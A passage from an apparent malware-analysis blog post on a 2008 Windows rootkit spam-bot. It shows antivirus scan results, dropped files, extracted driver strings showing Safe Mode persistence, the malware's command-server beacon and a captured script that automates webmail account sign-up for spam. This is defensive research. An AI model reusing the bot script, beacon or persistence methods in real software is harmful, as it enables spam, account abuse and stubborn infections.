C:\nriljal.exe</p>
</blockquote>
<blockquote><p>Report Generated 	20.11.2008 at 17.06.19 (GMT 1)<br />
Time for scan: 	23 seconds<br />
Filename: 	fklame32.dll<br />
File size: 	22 KB<br />
MD5 Hash: 	F049A08DD65E4AB04575B3667E56A408<br />
SHA1 Hash: 	1F0270794587CB51B514CFDA5B040C08CDD18212<br />
CRC32: 	733835836<br />
Application Type:	Dinamyc Link Library (DLL) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">9</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan.Win32.BHO.d!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/BHO.Gen</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: red;">Trojan.Generic.1134607</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: red;">Trojan.Win32.BHO.ibp A</span><br />
IkarusT3 	<span style="color: red;">Trojan.Win32.BHO.d</span><br />
Kaspersky 	<span style="color: red;">Trojan.Win32.BHO.ibp</span><br />
McAfee 	<span style="color: red;">Generic.dx trojan</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: red;">Mal/Emogen-G</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: red;">Trojan.Win32.BHO.ibp</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<blockquote><p>Report Generated 	20.11.2008 at 17.11.00 (GMT 1)<br />
Time for scan: 	26 seconds<br />
Filename: 	naxv.exe<br />
File size: 	172 KB<br />
MD5 Hash: 	1EDB6B045A907E4F63EAFBCA43E8660E<br />
SHA1 Hash: 	E7B6CF6D1BC634F3F96D8EDA786F056B614EA6BC<br />
CRC32: 	1878180187<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">3</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: green;">Nothing found!</span><br />
Avira AntiVir 	<span style="color: green;">Nothing found!</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: red;">W32/FakeAlert.3!Maximus</span><br />
G DATA 	<span style="color: green;">Nothing found!</span><br />
IkarusT3 	<span style="color: green;">Nothing found!</span><br />
Kaspersky 	<span style="color: green;">Nothing found!</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: red;">a variant of Win32/Kryptik.BX trojan</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: red;">Suspicious</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: green;">Nothing found!</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>The file named fklame32.dll was <strong>injected</strong> in 2 processes:<br />
-<strong>IEXPLORE.EXE</strong><br />
-<strong>explorer.exe</strong></p>
<p>Another files were created:</p>
<blockquote><p>C:\DOCUME~1\user899\LOCALS~1\Temp\newbot.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\csrssc.exe  =&gt; Has attribute +H (Hidden)<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\loader.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\2029295898.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\2155777770.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\2165992458.exe<br />
C:\WINDOWS\system32\bdedabafadb.dll</p>
</blockquote>
<blockquote><p>Report Generated 	20.11.2008 at 17.17.38 (GMT 1)<br />
Time for scan: 	27 seconds<br />
Filename: 	newbot.exe<br />
File size: 	71 KB<br />
MD5 Hash: 	29A9BDF7B39FFDC8AC8AE4EFEB540E35<br />
SHA1 Hash: 	681E92D08A374E8086303A9E453727BF609B283B<br />
CRC32: 	2651006629<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">2</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: green;">Nothing found!</span><br />
Avira AntiVir 	<span style="color: green;">Nothing found!</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: red;">Trojan.Win32.Inject.kdz A</span><br />
IkarusT3 	<span style="color: green;">Nothing found!</span><br />
Kaspersky 	<span style="color: red;">Trojan.Win32.Inject.kdz</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos <span style="color: green;"> Nothing found!</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>After, the file named <strong>bdedabafadb.dll</strong> was injected in <strong>explorer.exe</strong> and another file was created:</p>
<blockquote><p>C:\Documents and Settings\user899\Application Data\gadcom\gadcom.exe</p>
</blockquote>
<p>And was created also a new directory:</p>
<blockquote><p>C:\WINDOWS\tsd532</p>
</blockquote>
<blockquote><p>Report Generated 	20.11.2008 at 17.26.58 (GMT 1)<br />
Time for scan: 	24 seconds<br />
Filename: 	gadcom.exe<br />
File size: 	55 KB<br />
MD5 Hash: 	3C4A94886E1A2C015CA9758E69A4A33B<br />
SHA1 Hash: 	6D86EB185C7DEC2E1FD7C4BD3291D5357CA2CA2B<br />
CRC32: 	1614352094<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">5</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan.Win32.Matcash!IK</span><br />
Avira AntiVir 	<span style="color: green;">Nothing found!</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: red;">Trojan.Win32.Agent.aorq A</span><br />
IkarusT3 	<span style="color: red;">Trojan.Win32.Matcash</span><br />
Kaspersky 	<span style="color: red;">Heur.Trojan.Generic</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos <span style="color: green;"> Nothing found!</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: red;">Win32.Trojan-Downloader</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>And now 2 interesting files were created in <strong>C:\WINDOWS\system32\drivers\</strong>:</p>
<blockquote><p>C:\WINDOWS\system32\drivers\ati5ssxx.sys<br />
C:\WINDOWS\system32\drivers\tcpsr.sys</p>
</blockquote>
<blockquote><p>Report Generated 	20.11.2008 at 15.21.44 (GMT 1)<br />
Time for scan: 	24 seconds<br />
Filename: 	ati5ssxx.kdmp<br />
File size: 	32 KB<br />
MD5 Hash: 	F8D0B66BD259EBC5D1C9B4C347CC684B<br />
SHA1 Hash: 	CEB0ED5C79626383158E2396F248C0CA8A796A06<br />
CRC32: 	3826122122<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	<span style="color: red;">File is possible binded with malware</span><br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">8</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Rootkit.Win32.Protector!IK</span><br />
Avira AntiVir 	<span style="color: red;">RKIT/Protector.BC</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: red;">Trojan horse Rootkit-Agent.AV</span><br />
BitDefender 	<span style="color: red;">Trojan.Kobcka.FB</span><br />
ClamAV 	<span style="color: red;">Trojan.Rootkit.Protector-1</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: green;">Nothing found!</span><br />
IkarusT3 	<span style="color: red;">Rootkit.Win32.Protector</span><br />
Kaspersky 	<span style="color: green;">Nothing found!</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman <span style="color: green;"> Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus <span style="color: green;"> Nothing found!</span><br />
Sophos 	<span style="color: green;">Nothing found!</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: red;">Rootkit.Siberia.Gen</span></p>
</blockquote>
<p>Below there are some interested strings extracted from the code:</p>
<blockquote><p>ntoskrnl.exe<br />
RSDS<br />
<strong>d:\programs\siberia2\protect\objfre_wxp_x86\i386\protect.pdb</strong><br />
services.exe<br />
<strong>d:\programs\siberia2\innerdrv\objfre_wxp_x86\i386\InnerDrv.pdb</strong></p>
<p>RtlAppendUnicodeStringToString<br />
wcslen<br />
memset<br />
ObfDereferenceObject<br />
strcmp<br />
PsLookupProcessByProcessId<br />
PsTerminateSystemThread<br />
KeDelayExecutionThread<br />
ZwClose<br />
PsCreateSystemThread<br />
wcsncpy<br />
ZwQueryValueKey<br />
RtlInitUnicodeString<br />
ZwOpenKey<br />
wcsncat<br />
wcscpy<br />
PsSetCreateProcessNotifyRoutine<br />
IoDeleteDevice<br />
IoCreateSymbolicLink<br />
IoCreateDevice<br />
IofCompleteRequest<br />
ZwWriteFile<br />
ZwCreateFile<br />
IoRegisterFsRegistrationChange<br />
KeInitializeMutex<br />
ObReferenceObjectByName<br />
IoDriverObjectType<br />
RtlAppendUnicodeToString<br />
ZwQueryDirectoryObject<br />
ZwOpenDirectoryObject<br />
KeReleaseMutex<br />
KeWaitForSingleObject<br />
memcpy<br />
ExAllocatePoolWithTag<br />
ExFreePoolWithTag<br />
MmIsAddressValid<br />
CmRegisterCallback<br />
ExInitializeResourceLite<br />
KeLeaveCriticalRegion<br />
ExReleaseResourceLite<br />
ExAcquireResourceExclusiveLite<br />
KeEnterCriticalRegion<br />
RtlCopyUnicodeString<br />
RtlCompareUnicodeString<br />
ExAcquireResourceSharedLite<br />
ObQueryNameString<br />
ZwEnumerateValueKey<br />
ExQueueWorkItem<br />
ZwSetValueKey<br />
ZwCreateKey<br />
ZwQuerySystemInformation<br />
PsLookupThreadByThreadId<br />
wcscmp<br />
KeUnstackDetachProcess<br />
KeStackAttachProcess<br />
ZwAllocateVirtualMemory<br />
ZwOpenProcess<br />
KeInsertQueueApc<br />
KeInitializeApc<br />
NtBuildNumber<br />
ntoskrnl.exe</p>
<p>memcpy<br />
ExFreePoolWithTag<br />
ExAllocatePoolWithTag<br />
ZwQuerySystemInformation<br />
ntoskrnl.exe</p>
<p>\SystemRoot\system32\drivers\<br />
services.exe<br />
ImagePath<br />
Start<br />
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\<br />
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\<br />
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\<br />
\DosDevices\Prot3<br />
\Device\Prot3<br />
\FileSystem<br />
CSDVersion<br />
\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Windows</p>
</blockquote>
<p>So this rootkit looks like to has got a name:<br />
<strong>siberia2</strong></p>
<p>We can see that the driver add itself to the <strong>Safe Boot</strong>:</p>
<blockquote><p>\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\<br />
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\</p>
</blockquote>
<p>This mean that if you will start Windows in <strong>Safe Mode</strong> the driver will be automatic loaded with the other trusted drivers !</p>
<p>Report of the scan of <strong>tcpsr.sys</strong>:</p>
<blockquote><p>Report Generated 	20.11.2008 at 15.21.44 (GMT 1)<br />
Time for scan: 	24 seconds<br />
Filename: 	tcpsr.dmp<br />
File size: 	8 KB<br />
MD5 Hash: 	D29B23728B03BED296C9DF4AC1B34303<br />
SHA1 Hash: 	34BCB3149A57C9B7A95BE29EA96EA5B18E678E42<br />
CRC32: 	2830732520<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found [Overlay] *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">2</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: green;">Nothing found!</span><br />
Avira AntiVir 	<span style="color: green;">Nothing found!</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: red;">Trojan horse SpamBot.G</span><br />
BitDefender 	<span style="color: red;">Rootkit.Cutwail.A</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: green;">Nothing found!</span><br />
IkarusT3 	<span style="color: green;">Nothing found!</span><br />
Kaspersky 	<span style="color: green;">Nothing found!</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: green;">Nothing found!</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>We can extract other interested strings from the code:</p>
<blockquote><p>hxxp://bestdiabetesdrugs.com/?<br />
hxxp://mexicandrugstor.com/?<br />
hxxp://superdrugsworld.com/?<br />
hxxp://superdrugssite.com/?<br />
hxxp://bestanxietydrugs.com/?<br />
hxxp://georgescheapdrugs.com/?<br />
hxxp://buydrugsonlinehere.com/?<br />
hxxp://ulcerdrugsonline.com/?<br />
hxxp://bestdrugsinternational.com/?<br />
hxxp://besttopicaldrugs.com/?</p>
<p><strong>d:\programs\mailgrab\drv\objchk_wxp_x86\i386\filt.pdb</strong><br />
IoDeleteDevice<br />
IoCreateSymbolicLink<br />
IoCreateDevice<br />
RtlInitUnicodeString<br />
IofCompleteRequest<br />
IoDeleteSymbolicLink<br />
ExFreePoolWithTag<br />
ExAllocatePool<br />
memcpy<br />
memset<br />
MmMapLockedPages<br />
KeTickCount<br />
KeBugCheckEx<br />
ntoskrnl.exe<br />
KfReleaseSpinLock<br />
KfAcquireSpinLock<br />
HAL.dll<br />
NdisDeregisterProtocol<br />
NdisRegisterProtocol<br />
NdisInitUnicodeString<br />
NDIS_BUFFER_TO_SPAN_PAGES<br />
NdisQueryBufferOffset<br />
NdisAllocateMemory<br />
NdisFreeMemory<br />
NDIS.SYS</p>
<p>\DosDevices\Filt<br />
\Device\Filt<br />
ndarProtocol</p>
</blockquote>
<p>So this rootkit should be named as:<br />
<strong>mailgrab</strong></p>
<p>And should be used for spam activity as we can see also from the detection name of AVG:<br />
<strong>Trojan horse SpamBot.G</strong></p>
<p>And now lets do a little analysis:</p>
<p>This rootkit variants seem pretty nasty, there aren&#8217;t <strong> SSDT / ShadowSSDT Hooks detected</strong>, if you use certain Anti-Rootkit software you&#8217;ll get a BSOD, rootkit driver is started also in Safe Mode Normal / Network Support, you cannot modify/change/delete any registry key that is related to the rootkit drivers, you cannot modify/change/delete the 2 files with extension .SYS that were created !!! The drivers seem to install hooks not only in Ntfs.sys and Fastfat.sys, but (if I am not wrong) also in:<br />
-FltMgr.sys<br />
-mrxdav.sys<br />
-mrxsmb.sys<br />
-Msfs.sys<br />
-Mup.sys<br />
-Npsf.sys<br />
-Netbios.sys<br />
-rdbss.sys<br />
-sr.sys<br />
-srv.sys</p>
<p>Also if you boot Windows in Safe Mode (at least in my case) the second driver named <strong>tcpsr.sys</strong> will be automatic deleted !</p>
<p>Apparently this rootkit seems to be the boss of the OS : )</p>
<p>Now lets see some images:</p>
<p><img src="http://novirusthanks.org/images/arrow.gif" alt="" /> <strong>Suspicious drivers modifications/hooks</strong>:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers1.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers2.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers3.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers4.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers5.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers6.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers7.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers8.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers9.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers10.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers11.gif" alt="" /><br />
<img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_drivers12.gif" alt="" /></p>
<p><img src="http://novirusthanks.org/images/arrow.gif" alt="" /> <strong>No SSDT hooks detected</strong></p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_No_SSDT.gif" alt="" /></p>
<p><img src="http://novirusthanks.org/images/arrow.gif" alt="" /> <strong>Stealth code detected</strong></p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_stealth_code.gif" alt="" /></p>
<p><img src="http://novirusthanks.org/images/arrow.gif" alt="" /> <strong>Visible processes</strong></p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_processi.gif" alt="" /></p>
<p><img src="http://novirusthanks.org/images/arrow.gif" alt="" /> <strong>Kernel Modifications</strong> (here I used Kernel Detective by GamingMasteR of at4re)</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_KrnMods.gif" alt="" /></p>
<p><img src="http://novirusthanks.org/images/arrow.gif" alt="" /> <strong>registry startup keys</strong></p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Rootkit_Siberia2_Analysis_startup.gif" alt="" /></p>
<p>Below there is some (different from the other analysis) Internet Traffic that we received with the malware:</p>
<blockquote><p>GET /?bot_id=0&amp;mode=1 HTTP/1.1<br />
User-Agent: imrabot<br />
Host: sys368.3fn.net:3084<br />
Cache-Control: no-cache</p>
</blockquote>
<p>When I browsed the link it looked like a Spam Control Panel or similar related to spam:</p>
<blockquote><p>&lt;form name = &#8220;request&#8221; action=&#8221;./?bot_id=1998477142&#8243; method=&#8221;POST&#8221;&gt;<br />
&lt;input type=hidden name=&#8221;bot_id&#8221; value=&#8221;1998477142&#8243;&gt;</p>
<p>&lt;szXML&gt;<br />
&lt;SCID&gt;1100000&lt;/SCID&gt;<br />
&lt;Cookie&gt;*@live[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*.live[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*hotmail*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*@msn[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*.msn[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*@msnaccountservices.*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*@atdmt[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*@advertising[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*msnportal*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*pointroll[*&lt;/Cookie&gt;<br />
&lt;Cookie&gt;*doubleclick[*&lt;/Cookie&gt;<br />
&lt;scriptRegAcc&gt;<br />
&lt;Navigate&gt;http://get.live.com/mail/overview&lt;/Navigate&gt;<br />
&lt;WaitAnyPagesWithText&gt;<br />
&lt;Debug&gt;2, fail wait page with GetFree button&lt;/Debug&gt;<br />
&lt;Text&gt;OmnitureInterface.buttonNotification&lt;/Text&gt;<br />
&lt;/WaitAnyPagesWithText&gt;</p>
<p>&lt;!--button get free--&gt;<br />
&lt;ToLink&gt;<br />
&lt;Debug&gt;3, fail click GetFree button&lt;/Debug&gt;<br />
&lt;TagName&gt;a&lt;/TagName&gt;<br />
&lt;outerHTML&gt;OmnitureInterface.buttonNotification&lt;/outerHTML&gt;<br />
&lt;/ToLink&gt;<br />
&lt;WaitAnyPagesWithText&gt;<br />
&lt;Debug&gt;4, fail wait reg page&lt;/Debug&gt;<br />
&lt;Text&gt;join.msn.com&lt;/Text&gt;<br />
&lt;Text&gt;signup.live.com&lt;/Text&gt;<br />
&lt;Text&gt;logout.aspx&lt;/Text&gt;<br />
&lt;/WaitAnyPagesWithText&gt;<br />
&lt;!--LOG OUT--&gt;<br />
&lt;If_ValidateInBodyHTML&gt;logout.aspx&lt;/If_ValidateInBodyHTML&gt;<br />
&lt;Then_ToLink&gt;<br />
&lt;TagName&gt;a&lt;/TagName&gt;<br />
&lt;outerHTML&gt;logout.aspx&lt;/outerHTML&gt;<br />
&lt;/Then_ToLink&gt;<br />
&lt;WaitAnyPagesWithText&gt;<br />
&lt;Debug&gt;14, fail wait reg page after logout&lt;/Debug&gt;<br />
&lt;Text&gt;join.msn.com&lt;/Text&gt;<br />
&lt;Text&gt;signup.live.com&lt;/Text&gt;<br />
&lt;/WaitAnyPagesWithText&gt;</p>
<p>&lt;!--To english page registration--&gt;<br />
&lt;Navigate&gt;https://signup.live.com/newuserdl.aspx?mkt=en-us&amp;amp;revipc=US&amp;amp;ru=http://mail.live.com/?newuser=yes&amp;amp;rx=http://get.live.com/mail/options&amp;amp;rollrs=04&amp;amp;lic=1&lt;/Navigate&gt;<br />
&lt;WaitAnyPagesWithText&gt;<br />
&lt;Debug&gt;5, fail wait English reg page&lt;/Debug&gt;<br />
&lt;Text&gt;submitForCP&lt;/Text&gt;<br />
&lt;Text&gt;reg&lt;/Text&gt;<br />
&lt;Text&gt;logout.aspx&lt;/Text&gt;<br />
&lt;/WaitAnyPagesWithText&gt;<br />
&lt;!--LOG OUT--&gt;<br />
&lt;If_ValidateInBodyHTML&gt;logout.aspx&lt;/If_ValidateInBodyHTML&gt;<br />
&lt;Then_ToLink&gt;<br />
&lt;TagName&gt;a&lt;/TagName&gt;<br />
&lt;outerHTML&gt;logout.aspx&lt;/outerHTML&gt;<br />
&lt;/Then_ToLink&gt;</p>
<p>&lt;!--Anketa--&gt;<br />
&lt;!--Name--&gt;<br />
&lt;AttrFillForm&gt;<br />
&lt;AttrName&gt;id&lt;/AttrName&gt;<br />
&lt;AttrValueNI&gt;iFirstName&lt;/AttrValueNI&gt;<br />
&lt;ValueForFillRndFromBase&gt;Names&lt;/ValueForFillRndFromBase&gt;<br />
&lt;/AttrFillForm&gt;<br />
&lt;!--Surname--&gt;<br />
&lt;AttrFillForm&gt;<br />
&lt;AttrName&gt;id&lt;/AttrName&gt;<br />
&lt;AttrValueNI&gt;iLastName&lt;/AttrValueNI&gt;<br />
&lt;ValueForFillRndFromBase&gt;Surnames&lt;/ValueForFillRndFromBase&gt;<br />
&lt;/AttrFillForm&gt;<br />
&lt;!--Sex--&gt;<br />
&lt;ClickTag&gt;<br />
&lt;TagName&gt;input&lt;/TagName&gt;<br />
&lt;AttrName&gt;id&lt;/AttrName&gt;<br />
&lt;AttrValueNI&gt;iGenderMale&lt;/AttrValueNI&gt;<br />
&lt;Click/&gt;<br />
&lt;/ClickTag&gt;<br />
&lt;!--Born--&gt;<br />
&lt;AttrFillForm&gt;<br />
&lt;AttrName&gt;id&lt;/AttrName&gt;<br />
&lt;AttrValueNI&gt;iBirthYear&lt;/AttrValueNI&gt;<br />
&lt;ValueForFillRndFromBase&gt;YearsOfBorn&lt;/ValueForFillRndFromBase&gt;<br />
&lt;/AttrFillForm&gt;</p>
<p>...</p>
<p>...</p>
</blockquote>
<p>After, started again the same aggressive Spam Activity as all the other rootkit analysis.</p>
<p>And below there is the <strong>HiJackThis Log</strong>:</p>
<blockquote><p>Logfile of Trend Micro HijackThis v2.0.0 (BETA)<br />
Scan saved at 4:12:49 PM, on 11/20/2008<br />
Platform: Windows XP SP2 (WinNT 5.01.2600)<br />
Boot mode: Normal</p>
<p>Running processes:<br />
C:\WINDOWS\System32\smss.exe<br />
C:\WINDOWS\system32\winlogon.exe<br />
C:\WINDOWS\system32\services.exe<br />
C:\WINDOWS\system32\savedump.exe<br />
C:\WINDOWS\system32\lsass.exe<br />
C:\WINDOWS\system32\svchost.exe<br />
C:\WINDOWS\System32\svchost.exe<br />
C:\WINDOWS\Explorer.EXE<br />
C:\WINDOWS\system32\spoolsv.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe<br />
C:\Documents and Settings\user899\Application Data\gadcom\gadcom.exe<br />
C:\WINDOWS\system32\wscntfy.exe</p>
<p>O2 - BHO: C:\WINDOWS\system32\jsne87fidgf.dll - {C5BF49A2-94F3-42BD-F434-3604812C897D} - C:\WINDOWS\system32\jsne87fidgf.dll (file missing)<br />
O4 - HKLM\..\Run: [rs32net] C:\WINDOWS\System32\rs32net.exe<br />
O4 &#8211; HKLM\..\Run: [xsjfn83jkemfofght] C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe<br />
O4 &#8211; HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k<br />
O4 &#8211; HKCU\..\Run: [rs32net] C:\WINDOWS\System32\rs32net.exe<br />
O4 &#8211; HKCU\..\Run: [xsjfn83jkemfofght] C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe<br />
O4 &#8211; HKCU\..\Run: [Jnskdfmf9eldfd] C:\DOCUME~1\user899\LOCALS~1\Temp\csrssc.exe<br />
O4 &#8211; HKCU\..\Run: [gadcom] &#8220;C:\Documents and Settings\user899\Application Data\gadcom\gadcom.exe&#8221; 61A847B5BBF72813349838466188719AB689201522886B092CBD44BD8689220221DD3257<br />
O4 &#8211; HKCU\..\Run: [12CFG94-z641-2SF-N31P-5M1ER6H6L1] C:\RECYCLER\S-1-5-21-3997352701-5278103066-943349985-9760\winigon.exe<br />
